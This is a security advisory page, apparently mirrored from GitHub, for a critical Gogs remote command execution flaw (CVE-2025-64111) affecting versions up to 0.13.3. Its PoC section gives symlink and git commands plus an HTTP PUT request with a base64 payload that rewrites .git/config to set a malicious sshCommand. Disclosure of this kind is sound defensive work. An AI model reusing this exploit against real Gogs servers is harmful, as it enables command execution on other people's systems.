Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-gg64-xxr9-qhjp

Опубликовано: 06 фев. 2026
Источник: github
Github: Прошло ревью
CVSS4: 9.3

Описание

Gogs's update .git/config file allows remote command execution

Summary

Due to the insufficient patch for the https://github.com/gogs/gogs/security/advisories/GHSA-wj44-9vcg-wjq7, it's still possible to update files in the .git directory and achieve remote command execution.

Details

Function UpdateRepoFile security check under some if conditions. While UpdateRepoFile call in API router will NOT match any of them. It's still possible to update .git/config file via API router. https://github.com/gogs/gogs/blob/d940e692ec58abd45e648c054d7dfd88909034ec/internal/route/api/v1/repo/contents.go#L197-L206

PoC

# add a symlink file and push to repo. ln -s .git/config link git add link git commit -m 'add' && git push

Update file via API router

PUT /api/v1/repos/demo/vul/contents/link HTTP/1.1 Content-Type: application/json Host: localhost:3000 Authorization: token {token} {"message":"message","committer":{"name":"test","email":"a@b.com"},"content":"W2NvcmVdCglyZXBvc2l0b3J5Zm9ybWF0dmVyc2lvbiA9IDAKCWZpbGVtb2RlID0gdHJ1ZQoJYmFyZSA9IGZhbHNlCglsb2dhbGxyZWZ1cGRhdGVzID0gdHJ1ZQoJaWdub3JlY2FzZSA9IHRydWUKCXByZWNvbXBvc2V1bmljb2RlID0gdHJ1ZQoJc3NoQ29tbWFuZCA9IHRvdWNoIC90bXAvYWJjCltyZW1vdGUgIm9yaWdpbiJdCgl1cmwgPSBzc2g6Ly9naXRAbG9jYWxob3N0L2RlbW8vdnVsLmdpdAoJZmV0Y2ggPSArcmVmcy9oZWFkcy8qOnJlZnMvcmVtb3Rlcy9vcmlnaW4vKgpbYnJhbmNoICJtYXN0ZXIiXQoJcmVtb3RlID0gb3JpZ2luCgltZXJnZSA9IHJlZnMvaGVhZHMvbWFzdGVy"}

Impact

RCE

Ссылки

Пакеты

Наименование

gogs.io/gogs

go
Затронутые версииВерсия исправления

<= 0.13.3

0.13.4

EPSS

Процентиль: 26%
0.00092
Низкий

9.3 Critical

CVSS4

CVE ID

CVE-2025-64111

Дефекты

CWE-78

Связанные уязвимости

nvd логотип

CVE-2025-64111

nvd
2 дня назад

Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, due to the insufficient patch for CVE-2024-56731, it's still possible to update files in the .git directory and achieve remote command execution. This issue has been patched in versions 0.13.4 and 0.14.0+dev.

EPSS

Процентиль: 26%
0.00092
Низкий

9.3 Critical

CVSS4

CVE ID

CVE-2025-64111

Дефекты

CWE-78